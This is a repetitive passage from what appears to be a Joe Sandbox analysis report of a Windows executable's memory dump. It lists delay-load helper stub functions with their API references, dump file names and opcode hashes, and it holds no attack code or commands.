Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 956eca64cbf013e0ff5b27165a433450bc3813b0a83c5cbd89588820d7c22dee
Instruction ID: 8b70659f259be49cde263a4a88ad24953eb50fdcfeaeb4d1f8368ad524108377
Opcode Fuzzy Hash: 956eca64cbf013e0ff5b27165a433450bc3813b0a83c5cbd89588820d7c22dee
Instruction Fuzzy Hash: DDB012C72681037D364491152C8BF3702DCC5C0B10334C0FFF018C1041E8405C411139

Function 00B7F364 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9366f15019caa8e12ce17ce1c20174622146acf2c7eb4966c83106cf18e7fa7
Instruction ID: e5bfa1caf45f359be8ce0a98e93828037b83f2a67550015c32a4231696b1b331
Opcode Fuzzy Hash: c9366f15019caa8e12ce17ce1c20174622146acf2c7eb4966c83106cf18e7fa7
Instruction Fuzzy Hash: D9B012872682037D3B8491152C8BF3702ECC5C0B10334C1FFF018C1041E8405C815039

Function 00B7F350 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c47d7cca283a41177bc19d7b0e5f3e71a066b8fcd8986260dd47473e1dcd9495
Instruction ID: efde089decae69eae06feb362cbfe1f94a0e7e0d6e87bdf30ed7232f2d695847
Opcode Fuzzy Hash: c47d7cca283a41177bc19d7b0e5f3e71a066b8fcd8986260dd47473e1dcd9495
Instruction Fuzzy Hash: 7FB012832781037D364491196C4BF3602ECC5C0B10330C1FFF118C1041E4405C41143D

Function 00B7F35A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f998f5cb5915d3069adb02874b4e980fa5affe2494ba06d0f1bf1aaacbf2fde
Instruction ID: 67ee0151ff504153a374c06fa4cacce428b8dcf497bb7070fba206e73eaaf307
Opcode Fuzzy Hash: 5f998f5cb5915d3069adb02874b4e980fa5affe2494ba06d0f1bf1aaacbf2fde
Instruction Fuzzy Hash: E2B012872681037D364491152C8BF3B02DCC5C0B10334C0FFF418C1041E8405C411039

Function 00B7F346 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7c7a207a3fca82c0ede37cfed51e6afc7dc2723463617f7371c022aeff1e509
Instruction ID: 146eeb93195700c48bf45f6d86cf92c2cf08c266fc122f115317869b3d328ee1
Opcode Fuzzy Hash: f7c7a207a3fca82c0ede37cfed51e6afc7dc2723463617f7371c022aeff1e509
Instruction Fuzzy Hash: EEB012832684037D3644911A6D4BF3602ECC5C0B10330C2FFF118C5041E4805C42103D

Function 00B7F40E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a47064e826b7e4e8200384a34f4c606c04a0678f9e55ef8c685368ade07bdaa
Instruction ID: f3f37d16d1e76fc057b0cab427d67545c9bb0a161a5be2c85384845e5f2882d2
Opcode Fuzzy Hash: 1a47064e826b7e4e8200384a34f4c606c04a0678f9e55ef8c685368ade07bdaa
Instruction Fuzzy Hash: 6AB012E32680037D364491162D4BF3602DCC5C0B11330C0FFF018C5041E4805C421039

Function 00B7F5A5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6875953755eafd49d0e868993331bf0aa969961a7cbd6b8ab1f3fe011af7604
Instruction ID: 52b05428f2699368cfd706976d54cf8624db352930e22e1a45c5db54128d203a
Opcode Fuzzy Hash: f6875953755eafd49d0e868993331bf0aa969961a7cbd6b8ab1f3fe011af7604
Instruction Fuzzy Hash: CDB012C32B80027F33045215BC57F3601CCC1C4B50330C2FFF018C1051D4409C40003A

Function 00B7F573 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91e98db9a6a35cf3b8f475545ad67120e5d96bf498e6c2cd56da8373c0909038
Instruction ID: 3b0518ec881a731a1244b2f5b2bb485f97c40655e6401fcd987ce0899f79ce8b
Opcode Fuzzy Hash: 91e98db9a6a35cf3b8f475545ad67120e5d96bf498e6c2cd56da8373c0909038
Instruction Fuzzy Hash: 39B012C32A82027F370452157C87E3601DCC5C4B10330C1FEF418C1051D8409C840036

Function 00B7F57D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F556

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb32ffe575eb6ec18acf3b5da76741b6bbe808bd10559939a39052c0d1aa5e1d
Instruction ID: ff8329750301e65d962ddb431fa5ed68968039d2c0dc0bfb099f415fa389314d
Opcode Fuzzy Hash: bb32ffe575eb6ec18acf3b5da76741b6bbe808bd10559939a39052c0d1aa5e1d
Instruction Fuzzy Hash: 43B012C32E81027F330452157C97F3601CCC1C4B10330C0FEF418C1051D8409C400136

Function 00B7F6B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f89a953bc22949c6e67c7d3f5ea73123ecbf3df38cafa6d907d97893f3ca4fb4
Instruction ID: f859bdc5213cd037c2b1877d6ebd873ab9de86e951e4525548c75fb30919b9cc
Opcode Fuzzy Hash: f89a953bc22949c6e67c7d3f5ea73123ecbf3df38cafa6d907d97893f3ca4fb4
Instruction Fuzzy Hash: 85B0128327C1027D330451252C47E3601CCC4C4B10330C1FEF028C0191D8419C881135

Function 00B7F6BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 57b9a7eb705c3db8436c82ce1dcc9d592642574d53a3349770411b9c54a82f66
Instruction ID: 1b8a646f21f998d8e0e9d998c43b725fc71034c2b0b8e38bfe1365f1bc1263f8
Opcode Fuzzy Hash: 57b9a7eb705c3db8436c82ce1dcc9d592642574d53a3349770411b9c54a82f66
Instruction Fuzzy Hash: 74B0128327C0027D320451252D47E3601CCC0C4B10330C0FEF128C4091D8419C451135

Function 00B7F699 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a80dd59c66437260970f6ddcd0f3a53f60b7b6f18ff68b0d63cc47a6e4a0b8c1
Instruction ID: 068195ace9b32d7bdc5d87d990e6c7d7e518c64e3f9e7933597698cc98fdd441
Opcode Fuzzy Hash: a80dd59c66437260970f6ddcd0f3a53f60b7b6f18ff68b0d63cc47a6e4a0b8c1
Instruction Fuzzy Hash: 10B0128737D0027D32041111BD47D3601CCC8C0B10330C0FEF114D409298419C411139

Function 00B7F6D2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 911656a5e0797ca3861948601da196b01bc880021e2c4a7adae9f3a4bdff4fa3
Instruction ID: 646f76655311c56cb61a687d50b5f8ee65c2e3f7e74a6b947e48a09f61e92ce2
Opcode Fuzzy Hash: 911656a5e0797ca3861948601da196b01bc880021e2c4a7adae9f3a4bdff4fa3
Instruction Fuzzy Hash: 39B0128327C002BD320451152C47E3A01DCC0C4B10330C0FEF418C5091D8409C441135

Function 00B7F733 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a0df1e9c1229f9bf0d2f03b247946627a5ac220ab4c300861991ed45a303704d
Instruction ID: 5aef70c08f297572aa42af1b0793a0e0687b2004fed9dace1001a61d2aae26f0
Opcode Fuzzy Hash: a0df1e9c1229f9bf0d2f03b247946627a5ac220ab4c300861991ed45a303704d
Instruction Fuzzy Hash: DFB0128326C2027D335851192C8BF3601CCC4C0B10330C9FEF018C0041D4405CC00035

Function 00B7F73D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7b02067e86c69c2bc5ecc34edf3cef19d66bb233280c3937cad488361d90952
Instruction ID: aaa95c9d973cdbf9d3590089c30d4ff23d0c8dfcc20e9ec10be69209cf687d9f
Opcode Fuzzy Hash: a7b02067e86c69c2bc5ecc34edf3cef19d66bb233280c3937cad488361d90952
Instruction Fuzzy Hash: C9B0128326C1027D321851192C8BF3A01CCC4C0B10330C4FEF418C5041D4405C840035

Function 00B7F71F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd16280a2d36d769a1cb0fbc4110baadc67a9c917362b1f81593160fdc5edc44
Instruction ID: 0e6a4982ab8ce5132f3cd42d6e79a62d627325f5413736b292e8cf509d03c2d1
Opcode Fuzzy Hash: bd16280a2d36d769a1cb0fbc4110baadc67a9c917362b1f81593160fdc5edc44
Instruction Fuzzy Hash: 77B0128326C1027D3208511A2D8BF3601CCC4C0B10330C4FEF028C4041D4805D810035

Function 00B7F3B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
